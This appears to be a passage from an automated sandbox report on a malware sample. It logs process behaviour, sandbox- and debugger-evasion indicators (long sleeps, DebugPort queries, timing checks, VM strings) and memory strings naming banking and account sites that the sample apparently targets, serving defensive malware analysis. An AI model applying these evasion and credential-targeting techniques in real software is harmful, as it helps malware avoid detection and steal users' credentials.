        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\where.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\where.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\where.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\where.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\where.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Switches to a custom stack to bypass stack traces
        Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
        Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
        Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
        Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
        Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
        Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
        Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
        Source: C:\Windows\SysWOW64\where.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321BBA0 rdtsc 5_2_0321BBA0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1716Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 793Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3596Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6215Jump to behavior
        Source: C:\Windows\SysWOW64\where.exeWindow / User API: threadDelayed 9839Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 0.8 %
        Source: C:\Windows\SysWOW64\where.exeAPI coverage: 3.1 %
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5896Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620Thread sleep count: 3596 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620Thread sleep count: 6215 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7136Thread sleep time: -20291418481080494s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\where.exe TID: 2292Thread sleep count: 135 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\where.exe TID: 2292Thread sleep time: -270000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\where.exe TID: 2292Thread sleep count: 9839 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\where.exe TID: 2292Thread sleep time: -19678000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe TID: 6620Thread sleep time: -35000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\SysWOW64\where.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\where.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0079C990 FindFirstFileW,FindNextFileW,FindClose,8_2_0079C990
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D4C12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D3BDB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QEMU Virtual CPU
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D4C12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
        Source: 356hF-43.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
        Source: 356hF-43.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D4C12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
        Source: 356hF-43.8.drBinary or memory string: global block list test formVMware20,11696428655
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D4C12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
        Source: wscript.exe, 00000000.00000003.2114526404.00000276095DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: 356hF-43.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D4C12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D3DB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
        Source: 356hF-43.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D4C12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
        Source: 356hF-43.8.drBinary or memory string: AMC password management pageVMware20,11696428655
        Source: 356hF-43.8.drBinary or memory string: tasks.office.comVMware20,11696428655o
        Source: 356hF-43.8.drBinary or memory string: interactivebrokers.comVMware20,11696428655
        Source: 356hF-43.8.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
        Source: 356hF-43.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D3BDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244534059.00000127CEBE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: root\CIMV2;SELECT * FROM Win32_ProcessorName!QEMU Virtual CPU
        Source: 356hF-43.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
        Source: 356hF-43.8.drBinary or memory string: bankofamerica.comVMware20,11696428655x
        Source: 356hF-43.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D4C12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
        Source: 356hF-43.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D3DB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
        Source: 356hF-43.8.drBinary or memory string: discord.comVMware20,11696428655f
        Source: where.exe, 00000008.00000002.3403339543.00000000028B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
        Source: 356hF-43.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D4C12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D4C12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
        Source: 356hF-43.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
        Source: 356hF-43.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
        Source: 356hF-43.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
        Source: 356hF-43.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
        Source: 356hF-43.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
        Source: 356hF-43.8.drBinary or memory string: outlook.office365.comVMware20,11696428655t
        Source: 356hF-43.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
        Source: firefox.exe, 0000000B.00000002.2785576658.0000027E4B39C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: 356hF-43.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
        Source: 356hF-43.8.drBinary or memory string: outlook.office.comVMware20,11696428655s
        Source: 356hF-43.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
        Source: 356hF-43.8.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
        Source: wscript.exe, 00000000.00000003.2114526404.00000276095DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: 356hF-43.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D3DB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
        Source: 356hF-43.8.drBinary or memory string: dev.azure.comVMware20,11696428655j
        Source: 356hF-43.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D4C12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D4C12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
        Source: 356hF-43.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
        Source: WKOyCvoOlM.exe, 0000000A.00000002.3404109099.00000000008EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\where.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321BBA0 rdtsc 5_2_0321BBA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00417D03 LdrLoadDll,5_2_00417D03
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B132D mov eax, dword ptr fs:[00000030h]5_2_032B132D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032B132D mov eax, dword ptr fs:[00000030h]5_2_032B132D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321F32A mov eax, dword ptr fs:[00000030h]5_2_0321F32A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EC310 mov ecx, dword ptr fs:[00000030h]5_2_031EC310
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322A30B mov eax, dword ptr fs:[00000030h]5_2_0322A30B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322A30B mov eax, dword ptr fs:[00000030h]5_2_0322A30B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0322A30B mov eax, dword ptr fs:[00000030h]5_2_0322A30B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327930B mov eax, dword ptr fs:[00000030h]5_2_0327930B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327930B mov eax, dword ptr fs:[00000030h]5_2_0327930B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327930B mov eax, dword ptr fs:[00000030h]5_2_0327930B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E7330 mov eax, dword ptr fs:[00000030h]5_2_031E7330
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03210310 mov ecx, dword ptr fs:[00000030h]5_2_03210310
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E9353 mov eax, dword ptr fs:[00000030h]5_2_031E9353
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E9353 mov eax, dword ptr fs:[00000030h]5_2_031E9353
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032AF367 mov eax, dword ptr fs:[00000030h]5_2_032AF367
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031ED34C mov eax, dword ptr fs:[00000030h]5_2_031ED34C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031ED34C mov eax, dword ptr fs:[00000030h]5_2_031ED34C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0329437C mov eax, dword ptr fs:[00000030h]5_2_0329437C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C5341 mov eax, dword ptr fs:[00000030h]5_2_032C5341
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03272349 mov eax, dword ptr fs:[00000030h]5_2_03272349
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03272349 mov eax, dword ptr fs:[00000030h]5_2_03272349
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03272349 mov eax, dword ptr fs:[00000030h]5_2_03272349
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03272349 mov eax, dword ptr fs:[00000030h]5_2_03272349
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03272349 mov eax, dword ptr fs:[00000030h]5_2_03272349
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03272349 mov eax, dword ptr fs:[00000030h]5_2_03272349
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03272349 mov eax, dword ptr fs:[00000030h]5_2_03272349
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03272349 mov eax, dword ptr fs:[00000030h]5_2_03272349
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03272349 mov eax, dword ptr fs:[00000030h]5_2_03272349
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03272349 mov eax, dword ptr fs:[00000030h]5_2_03272349
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03272349 mov eax, dword ptr fs:[00000030h]5_2_03272349
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03272349 mov eax, dword ptr fs:[00000030h]5_2_03272349
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03272349 mov eax, dword ptr fs:[00000030h]5_2_03272349
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03272349 mov eax, dword ptr fs:[00000030h]5_2_03272349
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_03272349 mov eax, dword ptr fs:[00000030h]5_2_03272349
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F7370 mov eax, dword ptr fs:[00000030h]5_2_031F7370
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F7370 mov eax, dword ptr fs:[00000030h]5_2_031F7370
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031F7370 mov eax, dword ptr fs:[00000030h]5_2_031F7370
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032BA352 mov eax, dword ptr fs:[00000030h]5_2_032BA352
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327035C mov eax, dword ptr fs:[00000030h]5_2_0327035C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327035C mov eax, dword ptr fs:[00000030h]5_2_0327035C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327035C mov eax, dword ptr fs:[00000030h]5_2_0327035C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327035C mov ecx, dword ptr fs:[00000030h]5_2_0327035C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327035C mov eax, dword ptr fs:[00000030h]5_2_0327035C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0327035C mov eax, dword ptr fs:[00000030h]5_2_0327035C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032233A0 mov eax, dword ptr fs:[00000030h]5_2_032233A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032233A0 mov eax, dword ptr fs:[00000030h]5_2_032233A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032133A5 mov eax, dword ptr fs:[00000030h]5_2_032133A5
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E8397 mov eax, dword ptr fs:[00000030h]5_2_031E8397
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E8397 mov eax, dword ptr fs:[00000030h]5_2_031E8397
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031E8397 mov eax, dword ptr fs:[00000030h]5_2_031E8397
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EE388 mov eax, dword ptr fs:[00000030h]5_2_031EE388
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EE388 mov eax, dword ptr fs:[00000030h]5_2_031EE388
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031EE388 mov eax, dword ptr fs:[00000030h]5_2_031EE388
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321438F mov eax, dword ptr fs:[00000030h]5_2_0321438F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0321438F mov eax, dword ptr fs:[00000030h]5_2_0321438F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C539D mov eax, dword ptr fs:[00000030h]5_2_032C539D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0324739A mov eax, dword ptr fs:[00000030h]5_2_0324739A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0324739A mov eax, dword ptr fs:[00000030h]5_2_0324739A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032003E9 mov eax, dword ptr fs:[00000030h]5_2_032003E9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032003E9 mov eax, dword ptr fs:[00000030h]5_2_032003E9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032003E9 mov eax, dword ptr fs:[00000030h]5_2_032003E9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032003E9 mov eax, dword ptr fs:[00000030h]5_2_032003E9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032003E9 mov eax, dword ptr fs:[00000030h]5_2_032003E9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032003E9 mov eax, dword ptr fs:[00000030h]5_2_032003E9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032003E9 mov eax, dword ptr fs:[00000030h]5_2_032003E9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032003E9 mov eax, dword ptr fs:[00000030h]5_2_032003E9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032AF3E6 mov eax, dword ptr fs:[00000030h]5_2_032AF3E6
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032C53FC mov eax, dword ptr fs:[00000030h]5_2_032C53FC
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320E3F0 mov eax, dword ptr fs:[00000030h]5_2_0320E3F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320E3F0 mov eax, dword ptr fs:[00000030h]5_2_0320E3F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0320E3F0 mov eax, dword ptr fs:[00000030h]5_2_0320E3F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_032263FF mov eax, dword ptr fs:[00000030h]5_2_032263FF
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FA3C0 mov eax, dword ptr fs:[00000030h]5_2_031FA3C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FA3C0 mov eax, dword ptr fs:[00000030h]5_2_031FA3C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FA3C0 mov eax, dword ptr fs:[00000030h]5_2_031FA3C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_031FA3C0 mov eax, dword ptr fs:[00000030h]5_2_031FA3C0
